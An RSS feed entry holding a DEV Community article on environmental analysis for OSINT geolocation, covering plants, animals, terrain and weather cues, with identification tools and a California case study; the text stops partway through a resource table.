<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Hitanshu Gedam</title>
    <description>The latest articles on DEV Community by Hitanshu Gedam (@hitanshugedam).</description>
    <link>https://dev.to/hitanshugedam</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3499351%2F816476e9-9f46-443b-a4c9-8adb4342ffbb.jpeg</url>
      <title>DEV Community: Hitanshu Gedam</title>
      <link>https://dev.to/hitanshugedam</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/hitanshugedam"/>
    <language>en</language>
    <item>
      <title>Reading the Wild: A Guide to Environmental Analysis in OSINT Investigations (OSINT series Part 2)</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 21 Jun 2026 10:59:29 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/reading-the-wild-a-guide-to-environmental-analysis-in-osint-investigations-osint-series-part-2-14bk</link>
      <guid>https://dev.to/hitanshugedam/reading-the-wild-a-guide-to-environmental-analysis-in-osint-investigations-osint-series-part-2-14bk</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;In the world of open-source intelligence (OSINT), the most compelling evidence is often hidden in plain sight—not in code or corporate filings, but in the natural world itself. While many investigations focus on human-made elements like buildings, signs, or digital footprints, a sophisticated approach involves analyzing the environment: plants, animals, terrain, and climate.&lt;/p&gt;

&lt;p&gt;This guide explores how to leverage environmental analysis as a powerful tool in your OSINT investigations, turning the natural world into a source of actionable intelligence.&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Why Environmental Analysis Matters&lt;/li&gt;
&lt;li&gt;Flora Analysis: Reading the Vegetation&lt;/li&gt;
&lt;li&gt;Fauna Analysis: Wildlife as Location Indicators&lt;/li&gt;
&lt;li&gt;Terrain and Geological Analysis&lt;/li&gt;
&lt;li&gt;Climate and Weather Indicators&lt;/li&gt;
&lt;li&gt;Integrated Environmental Analysis&lt;/li&gt;
&lt;li&gt;Real-World Applications&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;li&gt;Further Resources&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Why Environmental Analysis Matters
&lt;/h2&gt;

&lt;p&gt;Environmental elements offer unique advantages that make them particularly valuable for investigators.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Benefits
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Benefit&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Geographical Specificity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Many plant and animal species have specific geographic ranges&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Seasonal Indicators&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Natural elements change predictably with seasons&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Resistance to Manipulation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Environmental elements are difficult to falsify convincingly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Persistence in Remote Areas&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Natural features may be the only reliable indicators&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Challenges and Limitations
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;🧠 Requires specialized knowledge of biology, ecology, and geography&lt;/li&gt;
&lt;li&gt;🌍 Some species have wide distribution ranges&lt;/li&gt;
&lt;li&gt;🌡️ Climate change is altering traditional patterns&lt;/li&gt;
&lt;li&gt;🏙️ Human intervention can introduce non-native species&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💡 Pro Tip:&lt;/strong&gt; Despite these challenges, environmental analysis remains one of the most underutilized yet powerful techniques in the OSINT toolkit.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Flora Analysis: Reading the Vegetation
&lt;/h2&gt;

&lt;p&gt;Plant life provides some of the most useful environmental indicators, offering clues about location, climate, season, and even human activity patterns.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Vegetation Indicators
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🌳 Native Tree Species → Specific geographic ranges
🌸 Flowering Plants → Predictable bloom times
🌾 Agricultural Crops → Regional planting schedules
🌿 Plant Health → Season and climate indicators
🌲 Vegetation Density → Climate patterns and land use
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Flora Analysis Process
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Identify&lt;/strong&gt; distinctive plant species or vegetation patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Research&lt;/strong&gt; the geographic distribution of identified species&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Consider&lt;/strong&gt; growth stage or condition (flowering, fruiting, dormant)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cross-reference&lt;/strong&gt; with seasonal patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Look&lt;/strong&gt; for multiple plant indicators to narrow down the location&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Seasonal Vegetation Patterns
&lt;/h3&gt;

&lt;p&gt;Vegetation changes predictably with seasons:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Season&lt;/th&gt;
&lt;th&gt;Northern Hemisphere&lt;/th&gt;
&lt;th&gt;Southern Hemisphere&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Spring&lt;/td&gt;
&lt;td&gt;March - May&lt;/td&gt;
&lt;td&gt;September - November&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Summer&lt;/td&gt;
&lt;td&gt;June - August&lt;/td&gt;
&lt;td&gt;December - February&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Autumn&lt;/td&gt;
&lt;td&gt;September - November&lt;/td&gt;
&lt;td&gt;March - May&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Winter&lt;/td&gt;
&lt;td&gt;December - February&lt;/td&gt;
&lt;td&gt;June - August&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;⚠️ Important:&lt;/strong&gt; When analyzing fall foliage or spring blooms, pay attention to the progression of the season. Early, peak, and late seasonal stages can narrow the timeframe to within a few weeks.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Tools for Flora Identification
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;iNaturalist&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Community-based species identification&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.inaturalist.org/" rel="noopener noreferrer"&gt;inaturalist.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;PlantNet&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AI-powered plant identification&lt;/td&gt;
&lt;td&gt;&lt;a href="https://plantnet.org/" rel="noopener noreferrer"&gt;plantnet.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;USDA Plants Database&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Plant distribution in the US&lt;/td&gt;
&lt;td&gt;&lt;a href="https://plants.usda.gov/" rel="noopener noreferrer"&gt;plants.usda.gov&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Fauna Analysis: Wildlife as Location Indicators
&lt;/h2&gt;

&lt;p&gt;Animal species can provide precise location indicators and seasonal information for OSINT investigations.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Fauna Indicators
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🦘 Endemic Species → Found only in specific regions
🦅 Migratory Patterns → Seasonal movements
🐻 Behavioral Cues → Breeding, hibernation patterns
🐄 Domestic Animals → Regional livestock practices
🐦 Urban Wildlife → Regionally specific species
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Fauna Analysis Process
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Identify&lt;/strong&gt; animal species visible in the image or video&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Research&lt;/strong&gt; the geographic range and habitat requirements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Consider&lt;/strong&gt; behavioral indicators that might suggest season&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Look&lt;/strong&gt; for multiple species to narrow down the location&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cross-reference&lt;/strong&gt; with other environmental indicators&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Practical Example
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;The presence of a kangaroo immediately narrows a location to Australia. If the image also shows a specific subspecies like the Antilopine Kangaroo, the location can be further narrowed to northern Australia (Northern Territory, Queensland, and Western Australia).&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Tools for Fauna Identification
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;iNaturalist&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Community species identification&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.inaturalist.org/" rel="noopener noreferrer"&gt;inaturalist.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Merlin Bird ID&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Bird species identification&lt;/td&gt;
&lt;td&gt;&lt;a href="https://merlin.allaboutbirds.org/" rel="noopener noreferrer"&gt;merlin.allaboutbirds.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Global Biodiversity Information Facility&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Species occurrence database&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.gbif.org/" rel="noopener noreferrer"&gt;gbif.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Terrain and Geological Analysis
&lt;/h2&gt;

&lt;p&gt;Landforms, soil types, and geological features provide valuable location indicators that often remain stable over long periods.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Terrain Indicators
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;⛰️ Mountain Profiles → Distinctive shapes
🪨 Rock Formations → Unique geological features
🟫 Soil Color/Composition → Regional geology
💧 Water Features → Lakes, rivers, coastlines
🌊 Erosion Patterns → Climate and geology indicators
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💡 Pro Tip:&lt;/strong&gt; Terrain analysis is particularly valuable because geological features change very slowly compared to vegetation or human structures, making them reliable reference points even in historical imagery.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Terrain Analysis Process
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Identify distinctive terrain features&lt;/li&gt;
&lt;li&gt;Use topographic maps and elevation data&lt;/li&gt;
&lt;li&gt;Consider how terrain appears from different angles&lt;/li&gt;
&lt;li&gt;Look for multiple terrain features for confirmation&lt;/li&gt;
&lt;li&gt;Use 3D visualization tools to verify potential matches&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Tools for Terrain Analysis
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Google Earth&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3D terrain visualization&lt;/td&gt;
&lt;td&gt;&lt;a href="https://earth.google.com/" rel="noopener noreferrer"&gt;earth.google.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;USGS Earth Explorer&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Satellite imagery and elevation data&lt;/td&gt;
&lt;td&gt;&lt;a href="https://earthexplorer.usgs.gov/" rel="noopener noreferrer"&gt;earthexplorer.usgs.gov&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OpenTopography&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;High-resolution topographic data&lt;/td&gt;
&lt;td&gt;&lt;a href="https://opentopography.org/" rel="noopener noreferrer"&gt;opentopography.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Peakfinder&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Identify mountain peaks&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.peakfinder.org/" rel="noopener noreferrer"&gt;peakfinder.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Climate and Weather Indicators
&lt;/h2&gt;

&lt;p&gt;Weather conditions and climate indicators provide valuable information about both location and timing.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Climate Indicators
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;❄️ Snow Cover → Season and climate zone
☁️ Cloud Patterns → Regional characteristics
🌧️ Precipitation Types → Rain, snow, fog
💨 Wind Effects → Vegetation and sand patterns
🌊 Water Conditions → Wave patterns, ice cover
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Weather as OSINT Data
&lt;/h3&gt;

&lt;p&gt;OSINT tools like Weather2Geo can turn weather widget leaks into geolocation data. When people post screenshots with weather widgets showing temperature, weather condition, and local time, these tools can match that data to cities where those conditions are currently true.&lt;/p&gt;

&lt;h3&gt;
  
  
  Weather Analysis Process
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Identify weather conditions visible in the image&lt;/li&gt;
&lt;li&gt;Research historical weather data for potential locations&lt;/li&gt;
&lt;li&gt;Consider how climate affects vegetation and human activity&lt;/li&gt;
&lt;li&gt;Look for multiple weather indicators&lt;/li&gt;
&lt;li&gt;Cross-reference with other environmental elements&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Tools for Climate Analysis
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Weather Underground History&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Historical weather conditions&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.wunderground.com/history" rel="noopener noreferrer"&gt;wunderground.com/history&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NOAA Climate Data&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Comprehensive weather records&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.ncdc.noaa.gov/" rel="noopener noreferrer"&gt;ncdc.noaa.gov&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Windy.com&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Wind patterns visualization&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.windy.com/" rel="noopener noreferrer"&gt;windy.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Integrated Environmental Analysis
&lt;/h2&gt;

&lt;p&gt;The most powerful environmental analysis combines multiple natural indicators to triangulate location and time with high precision.&lt;/p&gt;

&lt;h3&gt;
  
  
  Combining Multiple Indicators
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;🌿 Flora + 🦔 Fauna → Specific ecosystems
⛰️ Terrain + 🌳 Vegetation → Microclimates and habitats
🌡️ Climate + 🍂 Seasonal → Precise timeframes
🌍 Natural + 🏗️ Human → Cross-referenced findings
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Practical Workflow
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;graph TD
    A[Begin with distinctive environmental elements] --&amp;gt; B[Make initial assessments]
    B --&amp;gt; C[Look for additional indicators]
    C --&amp;gt; D[Cross-check with human-made features]
    D --&amp;gt; E[Use specialized tools to verify]
    E --&amp;gt; F[Document methodology and confidence]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;⚠️ Important:&lt;/strong&gt; Be aware that climate change is altering traditional patterns of vegetation, animal distribution, and seasonal indicators. Always consider recent ecological changes in your analysis.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Case Study: Environmental Analysis in Action
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The Scenario&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Investigators received an image showing a rural landscape with no visible text or distinctive human-made structures. The image showed rolling hills, a distinctive tree line, and flowering plants in the foreground.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Analysis&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Identified a distinctive oak species (&lt;strong&gt;Quercus lobata&lt;/strong&gt;, Valley Oak) → Narrowed to California&lt;/li&gt;
&lt;li&gt;Orange California poppies in bloom → Suggested spring (March-May)&lt;/li&gt;
&lt;li&gt;Golden-brown grass on hills → Indicated beginning of California's dry season&lt;/li&gt;
&lt;li&gt;Rolling hill terrain pattern → Matched California Coast Ranges&lt;/li&gt;
&lt;li&gt;Focused on central California's coastal ranges in late April to early May&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The Result&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The analysis narrowed the location to a specific region in San Luis Obispo County, California. Using Google Earth's 3D terrain view, investigators matched the exact hill profile and tree line to a location along Highway 46. The timing was confirmed as late April based on the poppy bloom and grass conditions.&lt;/p&gt;




&lt;h2&gt;
  
  
  Real-World Applications
&lt;/h2&gt;

&lt;p&gt;Environmental OSINT techniques have proven valuable in various investigative contexts.&lt;/p&gt;

&lt;h3&gt;
  
  
  Environmental Crime Investigations
&lt;/h3&gt;

&lt;p&gt;Investigators increasingly use OSINT to expose environmental wrongdoing, from illegal fishing and shipbreaking to oil spills and deforestation. This work requires creativity and the ability to use alternative data sources that go beyond what is disclosed on the surface.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Techniques:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;📡 Satellite imagery monitoring&lt;/li&gt;
&lt;li&gt;🚢 AIS vessel tracking&lt;/li&gt;
&lt;li&gt;🗺️ Spatial analysis with QGIS&lt;/li&gt;
&lt;li&gt;🔍 Reverse image search for verification&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Conflict Zone Documentation
&lt;/h3&gt;

&lt;p&gt;Organizations like Bellingcat have used environmental analysis extensively in conflict zones. Investigators learn to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Map airstrikes using satellite imagery&lt;/li&gt;
&lt;li&gt;Identify perpetrators of environmental crimes&lt;/li&gt;
&lt;li&gt;Geolocate conflict footage&lt;/li&gt;
&lt;li&gt;Use Sentinel Hub satellite imagery&lt;/li&gt;
&lt;li&gt;Apply QGIS for spatial analysis&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Marine Investigations
&lt;/h3&gt;

&lt;p&gt;Satellite imagery and vessel tracking (AIS) data are invaluable for monitoring ocean threats:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Detect illegal bilge water dumping by spotting dark trails on satellite imagery&lt;/li&gt;
&lt;li&gt;Use AIS data to identify offending vessels&lt;/li&gt;
&lt;li&gt;Monitor illegal fishing activities&lt;/li&gt;
&lt;li&gt;Track oil spills and pollution&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Citizen Science Integration
&lt;/h3&gt;

&lt;p&gt;The growth of platforms like iNaturalist has opened new possibilities for using citizen-generated data in investigations. Despite challenges like bias and uneven coverage, these data sources offer scalable methods for revealing patterns of human interactions with nature.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Environmental analysis represents one of the most underutilized yet powerful approaches to geolocation and verification in OSINT investigations. By understanding how flora, fauna, terrain, and climate indicators vary across regions and seasons, investigators can extract precise location and timing information from images and videos, even when human-made elements are absent or ambiguous.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Takeaways
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Takeaway&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🌱 &lt;strong&gt;Environmental knowledge is cumulative&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;Each new species or feature adds to your toolkit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🔄 &lt;strong&gt;Combine multiple indicators&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;Yields the most reliable results&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🤝 &lt;strong&gt;Local expertise is invaluable&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;Consult regional specialists&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;📝 &lt;strong&gt;Document your methodology&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;Ensures findings can be verified&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💡 Remember:&lt;/strong&gt; The aim isn't just to prove something happened, but to connect it to responsibility and impact. Environmental analysis helps build that connection by providing verifiable, physical evidence.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Further Resources
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Species Identification
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🌿 &lt;strong&gt;iNaturalist&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.inaturalist.org/" rel="noopener noreferrer"&gt;inaturalist.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🌍 &lt;strong&gt;Global Biodiversity Information Facility&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.gbif.org/" rel="noopener noreferrer"&gt;gbif.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🌸 &lt;strong&gt;PlantNet&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://plantnet.org/" rel="noopener noreferrer"&gt;plantnet.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Satellite and Terrain Data
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🛰️ &lt;strong&gt;USGS Earth Explorer&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://earthexplorer.usgs.gov/" rel="noopener noreferrer"&gt;earthexplorer.usgs.gov&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🛰️ &lt;strong&gt;Sentinel Hub EO Browser&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.sentinel-hub.com/explore/eobrowser/" rel="noopener noreferrer"&gt;sentinel-hub.com/explore/eobrowser&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🏔️ &lt;strong&gt;OpenTopography&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://opentopography.org/" rel="noopener noreferrer"&gt;opentopography.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Weather and Climate
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;☁️ &lt;strong&gt;Weather Underground History&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.wunderground.com/history" rel="noopener noreferrer"&gt;wunderground.com/history&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;☀️ &lt;strong&gt;SunCalc&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.suncalc.org/" rel="noopener noreferrer"&gt;suncalc.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Geolocation Tools
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🗺️ &lt;strong&gt;Google Earth&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://earth.google.com/" rel="noopener noreferrer"&gt;earth.google.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;⛰️ &lt;strong&gt;Peakfinder&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.peakfinder.org/" rel="noopener noreferrer"&gt;peakfinder.org&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
